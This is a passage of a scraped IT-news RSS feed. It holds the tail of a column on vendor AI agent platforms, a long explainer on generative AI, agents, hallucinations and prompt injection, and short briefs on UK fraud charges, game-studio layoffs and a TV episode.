<p class="wp-block-paragraph">Many solution providers are demonstrating significantly more AI agents this year. For example, SAP went from <a href="https://drive.starcio.com/2026/05/autonomous-enterprise-ai-cios/">40 Joule Agents in 2025 to over 200 in 2026.</a> Three technology capabilities are fueling this significant growth:</p>



<ul class="wp-block-list">
<li>Adobe, Appian, Boomi, Cisco, Domo, Salesforce, SAP, Snowflake, and others offer <a href="https://www.infoworld.com/article/3497094/does-your-organization-need-a-data-fabric.html">data fabrics</a> and <a href="https://www.infoworld.com/article/3487711/the-definitive-guide-to-data-pipelines.html">data-pipeline</a> capabilities to connect data sources outside the primary workflows supported by their platforms. Appian, Pega, Quickbase, and SAP also centralize business process automation, an important starting point for developing AI agents.  </li>



<li><a href="https://www.infoworld.com/article/4124612/5-requirements-for-using-mcp-servers-to-connect-ai-agents.html">MCP servers</a> enable integration and communication between AI agents and are used to facilitate multistep agentic workflows. Virtually all the companies announcing major investments in AI agents are also announcing MCP integration capabilities and related partnerships.</li>



<li>Solution providers are not just using AI code-generating capabilities; many are launching their own AI agent development tools. The first beneficiaries of these development tools are the solution providers themselves and their integration partners, who use them to accelerate the development of AI agents and make them available to customers.</li>
</ul>



<p class="wp-block-paragraph">The result is that <a href="https://drive.starcio.com/2025/10/ai-agents-definitive-guide-saas-security-titans/">CIOs will have many options about which agents to test</a>, but will have to dedicate analysts to understand the capability, cost, and compliance trade-offs. Additionally, expect AI agent capabilities to evolve significantly over the next few years, so CIOs should continuously revisit their decisions regarding deployed AI agents, focusing on performance, benefits, and ROI.</p>



<p class="wp-block-paragraph">CIOs should also watch for signs of <a href="https://www.cio.com/article/1247890/7-steps-for-turning-shadow-it-into-a-competitive-edge.html">shadow AI</a> and employee confusion about which AI agents to experiment with on different platforms. The AI strategy should include a transparent, defined process for selecting, reviewing, evaluating, procuring, deploying, driving adoption, monitoring, and collecting end-user feedback around AI agents.</p>



<h2 class="wp-block-heading">AI development capabilities for engineers and citizen builders</h2>



<p class="wp-block-paragraph">The apparent ease-of-use of AI code generators may lead some engineering teams to <a href="https://www.cio.com/article/4097339/your-next-big-ai-decision-isnt-build-vs-buy-its-how-to-combine-the-two.html">build AI agents rather than buy them</a> from SaaS providers. But CIOs should quickly realize that coding is just one step in developing AI agents, and that aggressively pursuing a build strategy can lead to <a href="https://www.cio.com/article/4178324/7-sources-of-ai-debt-and-how-to-avoid-them.html">AI debt</a> and <a href="https://www.cio.com/article/4107377/cios-will-underestimate-ai-infrastructure-costs-by-30.html">increased AI costs</a>.</p>



<p class="wp-block-paragraph">DevOps teams can code AI agents using tools such as Claude, Codex, Lovable, and Replit — a do-it-yourself approach. Some SaaS companies are providing an alternative, with AI agent development tools that leverage the data, infrastructure, and governance baked into their platforms. Many of these development tools offer flexibility, allowing developer teams to select AI models and development environments.</p>



<p class="wp-block-paragraph">Examples of new and enhanced AI development tools I saw at conferences this quarter include:</p>



<ul class="wp-block-list">
<li><a href="https://appian.com/blog/2025/appian-25-4-release-enterprise-ai-agents">Appian Composer and Agent Studio</a></li>



<li><a href="https://www.atlassian.com/software/rovo-dev">Atlassian Rovo Dev</a></li>



<li><a href="https://boomi.com/platform/companion/">Boomi Companion</a></li>



<li><a href="https://www.cisco.com/site/us/en/solutions/artificial-intelligence/agentic-ops/cloud-control-studio/index.html">Cisco Cloud Control Studio</a></li>



<li><a href="https://www.domo.com/app-catalyst">Domo App Catalyst</a></li>



<li><a href="https://www.pega.com/about/news/press-releases/pega-harnesses-best-practices-and-ai-coding-agents-build-apps-mission">Pega Infinity Studio</a></li>



<li><a href="https://www.quickbase.com/pave">Quickbase Pave</a></li>



<li><a href="https://www.snowflake.com/en/product/snowflake-coco/">Snowflake CoCo</a></li>



<li><a href="https://www.sap.com/products/artificial-intelligence/joule-studio.html">SAP Joule Studio</a>.</li>
</ul>



<p class="wp-block-paragraph">I also reviewed <a href="https://www.nutanix.com/solutions/ai">Nutanix Agentic AI</a>, a platform-as-a-service for accelerating the deployment of agentic AI workloads, and <a href="https://www.adobe.com/products/firefly/features/ai-assistant.html">Adobe Firefly AI Assistant</a> for creatives.</p>



<p class="wp-block-paragraph">These development tools can target different audiences. Some look like low-code development tools targeted at software developers, whereas others are <a href="https://drive.starcio.com/2026/05/low-code-in-the-ai-era-cios-need-to-know/">no-code and enable citizen developers</a>, i.e., businesspeople, to <a href="https://www.cio.com/article/4176062/cios-are-enlisting-business-users-to-vibe-code-their-own-apps.html">develop applications and agents</a>. Additionally, some of these tools support spec-driven development and generate artifacts such as product requirement documents (PRDs), data models, and testing capabilities.</p>



<p class="wp-block-paragraph">Before commissioning AI development for apps and agents, CIOs should sponsor proofs of technical, data, modeling, security, and governance capabilities.</p>



<h2 class="wp-block-heading">The context layer powering AI agents</h2>



<p class="wp-block-paragraph">Between AI agents and the enterprise’s intelligence, including structured data sources, defined business processes, and agent interactions (both human-to-agent and agent-to-agent), lies an evolving “context layer.”</p>



<p class="wp-block-paragraph">This layer refers to the enterprise knowledge that AI agents draw on when evaluating signals and recommending or taking actions. Context may include a knowledge graph, a semantic layer, cleansed document repositories, and other knowledge bases.</p>



<p class="wp-block-paragraph">The context layer, skills, tools, out-of-the-box agents, and governance capabilities are some areas to review where solution providers differentiate. Some examples: </p>



<ul class="wp-block-list">
<li>Many support the <a href="https://open-semantic-interchange.org/">Open Semantic Interchange</a>, and some brand their context layers, such as the <a href="https://www.atlassian.com/platform/teamwork-graph">Atlassian Teamwork Graph</a>, <a href="https://boomi.com/knowledge-hub-early-access/">Boomi Knowledge Hub</a>, and the <a href="https://www.sap.com/products/artificial-intelligence/knowledge-graph.html">SAP Knowledge Graph</a>.</li>



<li>Some are branding their guardrails, such as <a href="https://business.adobe.com/products/brand-intelligence.html">Adobe’s AI Brand Intelligence</a>, <a href="https://appian.com/products/platform/artificial-intelligence">Appian’s Private AI</a>, and <a href="https://www.quickbase.com/intelligence-pack/ai-control-center">Quickbase AI Control Center</a>.</li>



<li>To manage AI agents at scale, some are extending the notion of data catalogs and other governance tools to the AI domain with products such as <a href="https://boomi.com/platform/connect/">Boomi Connect</a>, <a href="https://www.sap.com/products/artificial-intelligence/ai-agent-hub.html">SAP AI Agent Hub</a>, and <a href="https://www.snowflake.com/en/product/features/horizon/">Snowflake Horizon Catalog</a>.</li>
</ul>



<p class="wp-block-paragraph">CIOs should recognize that while solution providers will compete on capabilities, the real “secret sauce” of the context layer lies in the company’s trusted data, well-defined business processes, and employee adoption of AI agents.</p>



<h2 class="wp-block-heading">Conversational user experiences and coworkers</h2>



<p class="wp-block-paragraph">AI agents use the context layer, but also tap into skills, which encode the procedures they can follow, and tools, which prescribe the actions they can take. Before AI agents are ready to pilot, their governance, including permissions, approval gates, and other guardrails, must be defined. Other capabilities to look for when defining AI agents include orchestration, testing evals, and observability.</p>



<p class="wp-block-paragraph">In 2025, many solution providers bolted on AI agents to their existing user experiences. This year, many solution providers showcased new conversational user experiences that employees can use instead of traditional ones built with forms, flows, reports, and static dashboards. Conversational user experiences are where AI agents and people come together, whether it’s human-in-the-middle or human augmentation.</p>



<p class="wp-block-paragraph">Solution providers also grouped their AI agents into assistants or coworkers. For example, <a href="https://business.adobe.com/products/cx-enterprise-coworker.html">Adobe CX Coworker</a> illustrates human augmentation, helping marketers manage campaigns with prompts and monitor their performance. SAP launched <a href="https://www.sap.com/products/artificial-intelligence/ai-assistant.html">Joule Assistants</a> across several business functions, including finance, human capital, supply chain, and customer experience. Other assistants, such as <a href="https://docs.appian.com/suite/help/26.5/appian-ai-copilot.html">Appian AI Copilot</a>, <a href="https://www.atlassian.com/software/rovo">Atlassian Rovo</a>, <a href="https://www.cisco.com/site/us/en/solutions/artificial-intelligence/ai-assistant/index.html">Cisco AI Assistant</a>, <a href="https://www.nutanix.com/blog/nutanix-intelligent-virtual-agent">Nutanix NIVA</a>, and <a href="https://www.snowflake.com/en/product/snowflake-cowork/">Snowflake CoWork</a>, offer AI-first user experiences to assist different end-user types.</p>



<p class="wp-block-paragraph">CIOs should demo these <a href="https://www.infoworld.com/article/4178415/what-will-ai-first-ux-look-like.html">AI-first user experiences</a> to glimpse the future of work.</p>



<p class="wp-block-paragraph">Developers are already getting used to these experiences through code generators and vibe coding tools. Now, similar capabilities are being tailored across all business functions. CIOs should ramp up their <a href="https://www.cio.com/article/4082282/preparing-your-workforce-for-ai-agents-a-change-management-guide.html">change management programs</a> to accelerate the adoption of these AI capabilities.</p>



<p class="wp-block-paragraph">Solution providers are showcasing AI capabilities that can help CIOs <a href="https://drive.starcio.com/2026/04/ai-reshaping-business-not-digital-transformation-yet/">reshape their businesses</a>. But in Q2, there were only a few examples of how AI can help CIOs drive growth, evolve business models, or embed AI into customer-facing products. I expect to see a wave of further AI innovations that will go beyond productivity improvements and efficiencies and help CIOs pursue <a href="https://drive.starcio.com/2025/02/cios-drive-genai-digital-transformation/">growth-driving digital transformation strategies</a>.  </p>



<p class="wp-block-paragraph"><em>Sacolick travelled to conferences mentioned in this article as a guest of Adobe, Appian, Atlassian, Domo, Nutanix, SAP, and Snowflake. In addition, he was hired by Quickbase to speak at its conference.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Co-existing with AI: why replacement narratives are holding the public sector back]]></title>
<description><![CDATA[Why fears of replacement are preventing public services from embracing AI.]]></description>
<link>https://tsecurity.de/de/3667484/it-nachrichten/co-existing-with-ai-why-replacement-narratives-are-holding-the-public-sector-back/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667484/it-nachrichten/co-existing-with-ai-why-replacement-narratives-are-holding-the-public-sector-back/</guid>
<pubDate>Tue, 14 Jul 2026 11:49:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Why fears of replacement are preventing public services from embracing AI.]]></content:encoded>
</item>
<item>
<title><![CDATA[UK charges five persons linked to fraud platform behind more than a million scam calls]]></title>
<description><![CDATA[Five people have been charged in the UK following a National Crime Agency (NCA) investigation into Russian Coms, a caller ID spoofing service used by fraudsters. Ayoub Sehailia, 28, Zakkaria Sehailia, 30, Usman Din, 30, Denis Ozmus, 29, and Fadila Salem, 53, all of London, are charged with offenc...]]></description>
<link>https://tsecurity.de/de/3667468/it-security-nachrichten/uk-charges-five-persons-linked-to-fraud-platform-behind-more-than-a-million-scam-calls/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667468/it-security-nachrichten/uk-charges-five-persons-linked-to-fraud-platform-behind-more-than-a-million-scam-calls/</guid>
<pubDate>Tue, 14 Jul 2026 11:38:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Five people have been charged in the UK following a National Crime Agency (NCA) investigation into Russian Coms, a caller ID spoofing service used by fraudsters. Ayoub Sehailia, 28, Zakkaria Sehailia, 30, Usman Din, 30, Denis Ozmus, 29, and Fadila Salem, 53, all of London, are charged with offences that include conspiracy to supply articles for use in fraud, transferring and converting criminal property, and, for Zakkaria Sehailia, failing to comply with a notice to … <a href="https://www.helpnetsecurity.com/2026/07/14/russian-coms-nca-charges-scam-calls/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/14/russian-coms-nca-charges-scam-calls/">UK charges five persons linked to fraud platform behind more than a million scam calls</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Elder Scrolls 6 Faces New Delay Fears After Major Bethesda Layoffs]]></title>
<description><![CDATA[The Elder Scrolls 6 delay concerns have grown after Microsoft cut experienced developers across Bethesda and other Xbox studios. Employees now fear that losing veteran…
The post The Elder Scrolls 6 Faces New Delay Fears After Major Bethesda Layoffs appeared first on OnMSFT.]]></description>
<link>https://tsecurity.de/de/3665882/windows-tipps/the-elder-scrolls-6-faces-new-delay-fears-after-major-bethesda-layoffs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665882/windows-tipps/the-elder-scrolls-6-faces-new-delay-fears-after-major-bethesda-layoffs/</guid>
<pubDate>Mon, 13 Jul 2026 18:27:23 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Elder Scrolls 6 delay concerns have grown after Microsoft cut experienced developers across Bethesda and other Xbox studios. Employees now fear that losing veteran…</p>
<p>The post <a href="https://onmsft.com/news/the-elder-scrolls-6-faces-new-delay-fears-after-major-bethesda-layoffs/">The Elder Scrolls 6 Faces New Delay Fears After Major Bethesda Layoffs</a> appeared first on <a href="https://onmsft.com/">OnMSFT</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[There Are Endless Conspiracy Theories About Lindsay Graham's Death]]></title>
<description><![CDATA[Despite a complete lack of evidence, everyone from Russia to Israel and Iran is being blamed for Lindsey Graham’s death.]]></description>
<link>https://tsecurity.de/de/3665778/it-nachrichten/there-are-endless-conspiracy-theories-about-lindsay-grahams-death/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665778/it-nachrichten/there-are-endless-conspiracy-theories-about-lindsay-grahams-death/</guid>
<pubDate>Mon, 13 Jul 2026 18:04:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Despite a complete lack of evidence, everyone from Russia to Israel and Iran is being blamed for Lindsey Graham’s death.]]></content:encoded>
</item>
<item>
<title><![CDATA[What is generative AI? How artificial intelligence creates content]]></title>
<description><![CDATA[Generative AI is a kind of artificial intelligence that creates new content, including text, images, audio, and video, based on patterns it has learned from existing data.



Today’s generative models are typically built on foundation-model architectures such as large-language models (LLMs) and m...]]></description>
<link>https://tsecurity.de/de/3665675/ai-nachrichten/what-is-generative-ai-how-artificial-intelligence-creates-content/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665675/ai-nachrichten/what-is-generative-ai-how-artificial-intelligence-creates-content/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Generative AI is a kind of <a href="https://www.computerworld.com/article/1647870/what-is-artificial-intelligence.html">artificial intelligence</a> that creates new content, including text, images, audio, and video, based on patterns it has learned from existing data.</p>



<p class="wp-block-paragraph">Today’s generative models are typically built on foundation-model architectures such as <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">large-language models (LLMs)</a> and multimodal systems, enabling them to carry on conversations, answer questions, write stories, generate code, and produce images or videos from brief prompts.</p>



<p class="wp-block-paragraph"><em>Generative AI</em> is different from <em>discriminative AI</em>, which draws distinctions between different kinds of input. Where discriminative AI answers questions like “Is this image of a rabbit or a lion?”, generative AI instead responds to prompts such as “Describe to me how a rabbit and lion look different from one another” or “Draw me a picture of a lion and a rabbit sitting next to each other” — and in both cases produces text or imagery that, while grounded in the AI’s training data, isn’t just a copy of something that already existed.</p>



<aside class="fakesidebar">
<h4>[ <u><a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">Read next: Large language models: The foundations of generative AI</a></u> ]</h4>
</aside>




<p class="wp-block-paragraph">Just a few years ago, generative AI was once a novelty focused on chatbots and artistic image generation. Today, it has become a core enterprise technology, and powers everything from content creation and software development to customer support and analytics workflows. But with that power comes a <a href="https://www.csoonline.com/article/4076511/4-factors-creating-bottlenecks-for-enterprise-genai-adoption.html">new set of challenges</a> — from model alignment and hallucination to governance and data-integration hurdles.</p>



<p class="wp-block-paragraph">In this article, we’ll look at how generative AI works, explore how it has evolved into the foundation-model era, examine how to implement it effectively, and offer best practices for getting value out of it, today and in the future.</p>



<h2 class="wp-block-heading"><strong>How does generative AI work?</strong></h2>



<p class="wp-block-paragraph">For decades, early artificial-intelligence efforts often focused on rule-based systems or <a href="https://www.infoworld.com/article/4061121/a-brief-history-of-ai.html">narrowly trained models</a> that were built for one task at a time. While these efforts produced useful systems that could reason and solve human tasks, they were generally a far cry from sci-fi visions of thinking machines. Programs that could talk to people never seemed to get very far past the level of <a href="https://en.wikipedia.org/wiki/ELIZA">ELIZA</a>, a “computer therapist” created at MIT in the mid 1960s; even Siri and Alexa after much fanfare were revealed to be fairly limited.</p>



<p class="wp-block-paragraph">The big structural shift that gave birth to modern generative AI came with the concept of a <em>transformer, </em>first introduced in “<a href="https://arxiv.org/abs/1706.03762">Attention Is All You Need</a>,” a 2017 paper from Google researchers.</p>



<p class="wp-block-paragraph">Using a transformer architecture as a basis, you can build a system that derives meaning from analyzing long sequences of input <em>tokens</em> (words, sub-words, bytes) to understand how different tokens might be related to one another, then determines how likely any given token is to come next in a sequence, given the others. In AI lingo, we call these systems <em>models.</em> Because a model analyzes very large datasets and parameter counts, it can pick up on statistical patterns and knowledge implicitly embedded in the data.</p>



<p class="wp-block-paragraph">This is all easier said than done. The process of adjusting a model’s internal parameters so it gets better at predicting the next token in sequences is called <em>training</em>. During training, the model repeatedly guesses the next token in a given sequence, compares its prediction to the actual one, measures the error, and updates its parameters to reduce that error across billions of examples. Over time, that process teaches the model the statistical relationships that will allow it to generate coherent language (or code, or images) later.</p>



<h2 class="wp-block-heading"><strong>What is a foundation model?</strong></h2>



<p class="wp-block-paragraph">You’ll often hear the word <em>large</em> used for transformer-based models of these types, like the LLMs we mentioned earlier. <em>Large</em> in this context refers to the large number of internal numerical values that the model adjusts during training to represent what it has learned, along with breadth and diversity of data used to train the model and the underlying compute resources powering this whole process.</p>



<p class="wp-block-paragraph">This is in contrast with the narrow models of the earlier era of AI/ML, which werebuilt for one purpose and trained on a limited dataset. For instance, a spam filter may be very good at what it does, but it’s only trained on email data and all it can do is classify emails. Large models, by contrast, serve as what’s known as <em>foundation models</em>. They’re trained broadly on diverse data (text, code, images, or multimodal data) and then adapted or specialized for many downstream tasks.</p>



<p class="wp-block-paragraph">These foundation models are the basis for most of the popular generative AI tools and services on the market today. They can be specialized in several ways:</p>



<ul class="wp-block-list">
<li><strong>Fine-tuning:</strong> Giving a foundation model further training on a smaller, task-specific dataset</li>



<li><strong>Retrieval-augmented generation</strong> <strong>(RAG):</strong> Giving the model the ability to pull in external knowledge when asked a question</li>



<li> <strong>Prompt engineering</strong>: Tailoring a query so the model gives the sort of answers you’re looking for.</li>
</ul>



<h2 class="wp-block-heading"><strong>How do AI systems write computer code?</strong></h2>



<p class="wp-block-paragraph">One of the surprising discoveries of the gen AI era was that in recent years was that foundation models trained on natural-language text can also, when fine-tuned with code examples, also write computer code — often better than many purpose-built systems. Still, it makes sense, when you think about it — after all, high-level computer languages are designed by humans and ultimately based on human language.</p>



<p class="wp-block-paragraph">This <a href="https://www.infoworld.com/article/2338500/llms-and-the-rise-of-the-ai-code-generators.html?utm_source=chatgpt.com">2023 InfoWorld article</a> highlights how models like PaLM, LLaMA and other transformer-based systems fine-tuned on code repositories propelled this shift, but since AI giants like <a href="https://www.computerworld.com/article/3843138/agentic-ai-ongoing-coverage-of-its-impact-on-the-enterprise.html">OpenAI</a> have moved into this space. This all matters because code generation (or code-assisted productivity) has become a key enterprise use case of generative AI — perhaps <em>the </em>key use, given the industry’s enthusiastic adoption of it.</p>



<h2 class="wp-block-heading"><strong>What are AI agents?</strong></h2>



<p class="wp-block-paragraph">So far, we’ve been talking about chatbots, writing assistants, image-generation tools. They respond to prompts, output text or images, and then stop. A new category of tool called <em><a href="https://www.computerworld.com/article/3843138/agentic-ai-ongoing-coverage-of-its-impact-on-the-enterprise.html">agentic AI</a></em> goes further: it <em>plans</em>, <em>executes</em>, and in many cases <em>learns</em> as it works.</p>



<p class="wp-block-paragraph">Because large models already understand language, code, and even structured data to some extent, they can be repurposed to generate not only descriptive text but <em>operational instructions</em>. For example: an agent might parse the intent “generate a sales-report”, then format internal calls like getData(salesDB, region=NA, period=lastQuarter), and then call an API, all by generating text that’s interpreted as instructions. The <a href="https://www.infoworld.com/article/4064169/how-mcp-is-making-ai-agents-actually-do-things-in-the-real-world.html.">MCP framework</a> standardizes the “language” of those instructions and the plug-points into tools and data so that the model doesn’t need bespoke integrations for each new workflow.</p>



<p class="wp-block-paragraph">These kinds of autonomous agents have several enterprise use cases:</p>



<ul class="wp-block-list">
<li><strong>Software automation</strong>: Agents that generate code, call unit tests, deploy builds, monitor logs and even roll back changes autonomously.</li>



<li><strong>Customer support</strong>: Instead of simply drafting responses, agents interact with CRM APIs, update ticket statuses, escalate issues, and trigger follow-up workflows.</li>



<li><strong>IT operations/AIOps</strong>: Agents <a href="https://www.cio.com/article/222623/7-things-to-know-about-ai-in-the-data-center.html">monitor infrastructure, identify anomalies, open/close tickets, or auto-remediate</a> based on defined rules and context from logs.</li>



<li><strong>Security</strong>: Agents may detect threats, initiate alerts, isolate compromised systems, or even attempt to manage threat containment — though this raises new risks.</li>
</ul>



<h2 class="wp-block-heading"><strong>How can you implement generative AI in the enterprise?</strong></h2>



<p class="wp-block-paragraph">We’ve now touched on <em>what</em> generative AI can do. But <em>how</em> can you make it work reliably in your business. The difference between a pilot and full-scale deployment often comes down to systems, structure and governance as much as to models themselves. <em>InfoWorld’</em>s Matt Asay offers a <a href="https://www.infoworld.com/article/4044919/enterprise-essentials-for-generative-ai.html">deep dive into enterprise gen AI essentials</a>, but here are some important points to keep in mind:</p>



<p class="wp-block-paragraph"><strong>Choosing between API, open-source or custom fine-tuned models. </strong>One of the first major decisions for any enterprise project is: do you use a model via an API (e.g., from a vendor like OpenAI or Anthropic), deploy an open-source model internally, or build/fine-tune a custom model yourself? Each has trade-offs.</p>



<p class="wp-block-paragraph">APIs offer speed and minimal setup, but may expose data, limit customization or accrue high cost — and will leave you at the mercy of your vendor. Open source allows internal control and may ease fine-tuning, but requires infrastructure, expertise, and support. Custom fine-tuning gives you the tightest alignment to your use-case, but lengthens time to value and increases risk.</p>



<p class="wp-block-paragraph"><strong>Governance, data privacy and compliance. </strong>Deploying generative AI in an enterprise setting raises new governance, privacy and regulatory issues. For example: Who owns the data that’s ingested? How is proprietary data protected if you call a third-party API? What traceability exists for model outputs—a huge question for regulated industries? One useful framework is covered in “A GRC framework for securing generative AI” Data governance <a href="https://www.infoworld.com/article/2336154/how-data-governance-must-evolve-to-meet-the-generative-ai-challenge.html">must adapt for the new era</a>,  and <a href="https://www.infoworld.com/article/3604732/a-grc-framework-for-securing-generative-ai.html">new frameworks are evolving to help</a>.</p>



<p class="wp-block-paragraph"><strong>Human-in-the-loop review. </strong>Even the best models make mistakes and cannot simply be put on autopilot. You need a <em>human-in-the-loop (HITL)</em> process: real people need to review outputs, validate for bias, approve high-stakes content, and tune prompts or models based on feedback. Incorporating HITL checkpoints helps mitigate risk and improve overall quality.</p>



<p class="wp-block-paragraph"><strong>Integration with existing systems and RAG pipelines. </strong><a href="https://www.infoworld.com/article/2337050/how-rag-completes-the-generative-ai-puzzle.html">Retrieval-augmented generation</a>, which we touched on earlier, connects foundation models into business workflows, systems, and enterprise data stores. RAG can bind LLMs to your organization’s internal knowledge bases, thereby reducing <em>hallucinations </em>(which we’ll discuss in a moment) and increasing the relevance of gen AI output.</p>



<aside class="sidebar">
<h3><strong> Implementation best practices for generative AI</strong></h3>
<p> Here are four AI best practices to keep in mind:</p>
<ol>
<li> Guardrails: Define clear operational boundaries. Examples: restrict sensitive data output, enforce access controls, log model interactions.</li>
<li> Prompt engineering: Because much of what the model will do depends on how it’s prompted, invest in prompt design, versioning, review, and testing.</li>
<li> Evaluation metrics: Define appropriate KPIs (accuracy, latency, cost, business outcome), monitor them and iterate.</li>
<li> Model observability: Treat generative-AI systems like software — monitor performance, detect drift, handle failures gracefully, audit outputs and maintain traceability.</li>
</ol>
</aside>




<h2 class="wp-block-heading"><strong>What causes AI hallucinations?</strong></h2>



<p class="wp-block-paragraph">Probably the biggest limitation of generative AI is what those in the industry call <em>hallucinations</em>, which is a perhaps misleading term for output that is, by the standards of humans who use it, false or incorrect.  </p>



<p class="wp-block-paragraph">Every generative AI system, no matter how advanced, is built around prediction. Remember, a model doesn’t truly <em>know</em> facts—it looks at a series of tokens, then calculates, based on analysis of its underlying training data, what token is most likely to come next. This is what makes the output fluent and human-like, but if its prediction is wrong, that will be perceived as a hallucination.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/10/GenAI_takeaways.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Table describing five key points about generatvie AI" class="wp-image-4082262" width="1024" height="648" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Generative AI, foundation models, agentic AI, governance, and implementation strategy top the list of top generative AI takeaways.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p class="wp-block-paragraph">Because the model doesn’t distinguish between something that’s known to be true and something likely to follow on from the input text it’s been given, hallucinations are a direct side effect of the statistical process that powers generative AI. And don’t forget that we’re often pushing AI models to come up with answers to questions that we, who also have access to that data, can’t answer ourselves.</p>



<p class="wp-block-paragraph">In text models, hallucinations might mean inventing quotes, fabricating references, or misrepresenting a technical process. In code or data analysis, it can produce <a href="https://www.infoworld.com/article/3822251/how-to-keep-ai-hallucinations-out-of-your-code.html">syntactically correct but logically wrong results</a>. Even RAG pipelines, which provide real data context to models, only <em>reduce</em> hallucination—they don’t eliminate it. Enterprises using generative AI need <a href="https://www.cio.com/article/4073606/reducing-llm-hallucinations-in-enterprise-systems.html">review layers, validation pipelines, and human oversight</a> to prevent these failures from spreading into production systems.</p>



<h2 class="wp-block-heading"><strong>What are some other problems with generative AI?</strong></h2>



<p class="wp-block-paragraph">Generative AI has proven to be such a disruptive technology that’s stoking near-apocalyptic fears that it will result in a superintelligence that will enslave or destroy humanity. Meanwhile, in the present day, increasingly troubling reports of so-called <a href="https://www.psychologytoday.com/us/blog/urban-survival/202507/the-emerging-problem-of-ai-psychosis">AI psychosis</a> are emerging, where people have mental health episodes triggered by the uncanny and sometimes sycophantic ways chatbots affirm whatever you talk to them about and try to keep the conversation going.</p>



<p class="wp-block-paragraph">Compared to such existential questions, the following business-related problems may seem petty. But they’re real issues for enterprises considering investing in AI tools.</p>



<ul class="wp-block-list">
<li><strong>Data leakage and regulatory risk. </strong>When a model is fine-tuned or prompted with sensitive information, that data may be memorized and unintentionally reproduced. Using <a href="https://www.csoonline.com/article/3819170/nearly-10-of-employee-gen-ai-prompts-include-sensitive-data.html">third-party APIs without strict controls</a> can expose proprietary or personally identifiable information (PII). Regulatory frameworks like GDPR and HIPAA require explicit governance around where training data resides and how inference results are stored.</li>



<li><strong>Prompt injection </strong>occurs when an attacker manipulates a model’s instructions—embedding hidden directives or malicious payloads in user input or external content the model reads. This can override safety rules, expose internal data, or execute unintended actions in agentic systems. Guardrails that sanitize inputs, restrict tool-calling permissions, and validate outputs are becoming essential.</li>



<li><strong>Copyright and content ownership. </strong>Many foundation models are trained on data scraped from the public internet, creating disputes over copyright and data provenance. Enterprises using generated output commercially need to confirm usage rights and review indemnity terms from vendors.</li>



<li><strong>Unrealistic productivity expectations. </strong>Finally, organizations sometimes expect generative AI to deliver instant productivity gains. The reality, it turns out, is more <a href="https://leaddev.com/velocity/ai-doesnt-make-devs-as-productive-as-they-think-study-finds">mixed</a>. Enterprise adoption requires infrastructure, governance, retraining, and cultural change. The models accelerate work once properly integrated, but they don’t automatically replace human judgment or oversight.</li>
</ul>



<p class="wp-block-paragraph">The current generation of enterprise AI systems includes several layers of defense against these risks:</p>



<ul class="wp-block-list">
<li><em>Guardrails</em> that constrain model behavior and filter unsafe outputs.</li>



<li><em>Model validation</em> frameworks that measure factual accuracy and consistency before deployment.</li>



<li><em>Policy layers</em> that enforce compliance rules, redact sensitive data, and log model actions.</li>
</ul>



<p class="wp-block-paragraph">These safeguards reduce—but don’t remove—the inherent uncertainty that defines generative AI.</p>



<h2 class="wp-block-heading"><strong>GenAI: essential for the enterprise</strong></h2>



<p class="wp-block-paragraph">Generative AI has evolved from a novelty into a core layer of enterprise technology. Foundation models and agentic systems now power automation, analytics, and creative workflows — but they remain fundamentally probabilistic tools. Their strength lies in scale and adaptability, not perfect understanding.</p>



<p class="wp-block-paragraph">For organizations, success depends less on chasing model breakthroughs than on integrating these systems responsibly: building guardrails, maintaining oversight, and aligning them with real business needs. Used wisely, generative AI can amplify human capability rather than replace it.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 2 Explains Why Memory Is the Show’s Deadliest Weapon]]></title>
<description><![CDATA[Silo Season 3 is using its flashbacks to reveal how memory became one of the most powerful weapons behind the creation and control of the silos.



Episode 2, “It’s All Good,” continues the season’s split-timeline structure, moving between Juliette Nichols in Silo 18 and events from more than 350...]]></description>
<link>https://tsecurity.de/de/3664576/ios-mac-os/silo-season-3-episode-2-explains-why-memory-is-the-shows-deadliest-weapon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664576/ios-mac-os/silo-season-3-episode-2-explains-why-memory-is-the-shows-deadliest-weapon/</guid>
<pubDate>Mon, 13 Jul 2026 09:54:10 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 is using its flashbacks to reveal how memory became one of the most powerful weapons behind the creation and control of the silos.



